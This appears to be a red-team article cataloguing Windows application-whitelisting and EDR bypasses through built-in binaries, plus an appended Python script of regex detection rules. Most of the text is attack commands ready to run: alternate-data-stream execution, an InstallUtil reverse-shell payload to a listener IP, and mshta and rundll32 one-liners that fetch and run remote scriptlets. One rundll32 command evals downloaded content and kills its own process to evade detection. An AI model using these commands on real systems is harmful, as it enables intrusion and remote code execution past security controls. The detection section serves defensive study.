
During a red teaming assessment you may face restrictions due to policy enforcement, EDR, application whitelisting, etc., so in this article I am going to cover most of the techniques that may be useful for bypassing environment restrictions.

abusing writable paths

On some Windows 10 builds there are writable folder paths that can be abused by changing the ownership (ACL) of the desired location to one that includes execute rights. If a deny-execute rule for binaries is inherited, you can either disable inheritance or use a hard link to the binary:

fsutil hardlink create c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe 

mklink /h c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe

Also, I highly recommend checking for writable folders at the current level of permissions using the 0xsp Mongoose -W option.

Bypass Applications Whitelisting

Alternate Data Streams with AppLocker

After AppLocker is installed on a Windows machine, the first user to log in will have full access to the following file locations:

AppCache.dat
AppCache.dat.LOG1
AppCache.dat.LOG2

These files can be abused through alternate data stream execution, since AppLocker locks these files, so you may need to follow these steps:

  • adding the binary into the stream:
type evilfile.exe > C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe
  • calling wmic to create the process:
wmic process call create 'C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe'

You may also consider the following commands, which follow the same attack methodology (writing a payload into an alternate data stream):

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o

powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"

curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

InstallUtil.exe (T1118)

InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries (citation: MSDN InstallUtil). InstallUtil is located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe

We can generate C# shellcode with the following tool, then upload the generated file to the target machine:

python InstallUtil.py --cs_file temp.cs --exe_file temp.exe --payload windows/shell_reverse_tcp --lhost 192.168.68.104 --lport 443

Compile the C# code using csc.exe:

csc.exe temp.cs

Finally, you can execute the payload (the compiled assembly, not the .cs source) with the following command:

.\InstallUtil.exe /logfile= /LogToConsole=false /U temp.exe


PresentationHost.exe (T1218)

PresentationHost.exe is a built-in Windows executable used for proxy execution of code through a XAML Browser Application (XBAP), by loading an .xbap file into a specific process. Opening a .xbap file appears to launch the application inside Internet Explorer, but the code actually runs in another process (PresentationHost.exe). For a POC demonstration you may use the following code:

// XBAP button handler; requires System.Diagnostics and System.Windows
private void Button_Click(object sender, RoutedEventArgs e)
{
    // when the radio button is checked, start the external binary from the XBAP process
    if (RadioButton1.IsChecked == true)
    {
        Process.Start("C:\\poc\\evil.exe");
        MessageBox.Show("Hello.");
    }
}

Then you can execute the following payload:

Presentationhost.exe file:///tmp/poc.xbap

Also take into consideration that if it doesn't work due to security validation, it is better to build it through Visual Studio; you can check out this article.

Regsvcs.exe / Regasm.exe (T1121)

Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies.

This attack can be demonstrated by executing the following commands:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}

You may also achieve that with the following PowerShell command lines:

# base64-encoded strong-name key file; the original value was removed from this page, placeholder shown
$key = '<BASE64_SNK_KEY_PLACEHOLDER>'
$Content = [System.Convert]::FromBase64String($key)
Set-Content $env:Temp\key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library /keyfile:$env:Temp\key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{output_file}

Mshta.exe (T1170)

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications).

This utility can be used to launch different kinds of attacks that bypass restrictions put in place in an environment; the first common one uses a scriptlet (.sct) file.

Let us first generate the payload to use:

<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

<public>
    <method name="Exec"></method>
</public>

<script language="JScript">
<![CDATA[
    function Exec() {
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    }
]]>
</script>
</scriptlet>

Then save it as payload.sct, for example; after that you can simply call it through the mshta process:

mshta.exe javascript:a=(GetObject("script:http://192.168.68.104/payload.sct")).Exec();close();


Rundll32

As is well known, rundll32 can be used in several ways. The first command loads a DLL from a standard UNC path; in this case we are using rundll32 to execute a payload stored on a WebDAV server:

rundll32 \\webdavserver\folder\payload.dll,entrypoint

The other payload calls an inline script, again using the payload.sct we used before:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

We can also consider this tricky payload, which executes a process and then kills the rundll32.exe process after execution; that is very helpful for avoiding detection in some cases:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

On the other hand, we can still use rundll32 to bypass the restriction by creating processes through the entry points of registered system DLLs:

rundll32.exe advpack.dll,RegisterOCX calc.exe

rundll32.exe zipfldr.dll,RouteTheCall calc.exe

rundll32.exe url.dll,OpenURL "C:\test\calc.hta"

rundll32.exe url.dll, FileProtocolHandler calc.exe

rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"

rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,1,
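As an added example that is not part of the original article, the following Python script shows how a defender could flag the command lines from the techniques above (ADS execution, InstallUtil /U, mshta and rundll32 inline scripts, remote scriptlets, system DLL proxy entry points, hard links into system32) in process-creation telemetry; the rule names, regexes and sample command lines are my own constructions.

```python
import re

# Detection rules for the LOLBin patterns discussed on this page. Each rule is a
# (name, regex) pair applied to a process-creation command line (for example the
# CommandLine field of a Sysmon Event ID 1 or Windows Security 4688 record).
RULES = [
    # a drive-letter path whose last component carries a second ':' references an ADS
    ("ads_path", re.compile(r"[A-Za-z]:\\[^\s:'\"]+:[^\s'\"\\]+")),
    ("rundll32_inline_script", re.compile(r'rundll32(\.exe)?\s+"?(javascript|vbscript):', re.I)),
    ("mshta_inline_script", re.compile(r'mshta(\.exe)?\s+"?(javascript|vbscript):', re.I)),
    ("remote_scriptlet", re.compile(r"script:(https?|ftp)://", re.I)),
    ("installutil_uninstall", re.compile(r"installutil(\.exe)?\b.*\s/u\b", re.I)),
    ("regsvcs_regasm", re.compile(r"\breg(svcs|asm)(\.exe)?\s", re.I)),
    ("rundll32_system_dll_proxy", re.compile(
        r"rundll32(\.exe)?\s+(advpack|ieadvpack|zipfldr|url|ieframe)\.dll,\s*"
        r"(RegisterOCX|LaunchINFSection|RouteTheCall|OpenURL|FileProtocolHandler)\b", re.I)),
    ("hardlink_into_system32", re.compile(
        r"(fsutil\s+hardlink\s+create|mklink\s+/h)\s+\S*\\windows\\system32\\", re.I)),
]

def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

# Constructed sample command lines (not real telemetry): the first six mirror
# techniques from this article, the last two are benign noise.
SAMPLE_COMMAND_LINES = [
    r"wmic process call create 'C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe'",
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();',
    r'mshta.exe javascript:a=(GetObject("script:http://192.168.68.104/payload.sct")).Exec();close();',
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U temp.exe",
    r"rundll32.exe advpack.dll,RegisterOCX calc.exe",
    r"fsutil hardlink create c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe",
    r"notepad.exe C:\Users\alice\notes.txt",
    r"rundll32.exe shell32.dll,Control_RunDLL",
]

def scan(cmdlines):
    """Map each suspicious command line to the rules it triggered; clean lines are omitted."""
    return {line: hits for line in cmdlines if (hits := classify(line))}

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_COMMAND_LINES).items():
        print(", ".join(hits), "<-", line)
```

The benign lines show the rules are narrower than "any rundll32" or "any path with a colon"; tune the regexes against your own baseline before alerting on them.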